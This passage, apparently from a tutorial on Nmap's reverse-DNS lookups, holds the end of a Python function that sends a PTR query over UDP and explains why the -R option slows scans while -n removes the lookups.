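    the system resolver. Returns None on timeout or network error."""
    txid = secrets.randbits(16)  # unpredictable ID, so a forged reply is unlikely to match
    query = build_ptr_query(ip, txid)
    family = socket.AF_INET6 if ":" in server else socket.AF_INET
    with socket.socket(family, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(query, (server, 53))
            reply, _ = sock.recvfrom(512)
        except (socket.timeout, OSError):
            return None
    return parse_ptr_response(reply, txid)


if __name__ == "__main__":
    print(reverse_name("64.13.134.52"), reverse_name("2001:db8::1"))
    print(resolve_ptr("64.13.134.52"))  # needs network access; None on timeout
```

Because every address costs at least one round trip to the server, and Nmap asks for each address in the block when -R is given, the slowdown the text warns about is simply this query multiplied by the number of targets; -n removes it entirely.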